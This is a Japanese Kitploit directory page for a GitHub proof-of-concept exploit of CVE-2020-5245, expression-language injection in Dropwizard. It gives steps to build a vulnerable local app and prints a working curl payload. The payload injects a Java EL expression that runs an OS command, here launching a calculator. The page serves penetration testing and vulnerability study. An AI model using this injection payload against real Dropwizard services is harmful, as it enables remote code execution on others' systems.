Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-5245 — CVE-2020-5245 の概念実証エクスプロイト。Dropwizard REST エンドポイントにおける式言語インジェクションを、細工された HTTP パラメータを介して実証します。 | Kitploit
ツール/GitHubGitHub/lycshub/cve-2020-5245
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHublycshub/cve-2020-5245

CVE-2020-5245

CVE-2020-5245 の概念実証エクスプロイト。Dropwizard REST エンドポイントにおける式言語インジェクションを、細工された HTTP パラメータを介して実証します。

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-5245

  1. アプリケーションをビルドするには mvn clean install を実行してください
  2. アプリケーションを起動するには java -jar target/dropwizard-1.0-SNAPSHOT.jar server config.yml を実行してください
  3. アプリケーションが実行中か確認するには、URL http://localhost:8080 にアクセスしてください

pom.xml のエラーはプラグインに影響せず、再現されました

再現

curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}

ツールをダウンロード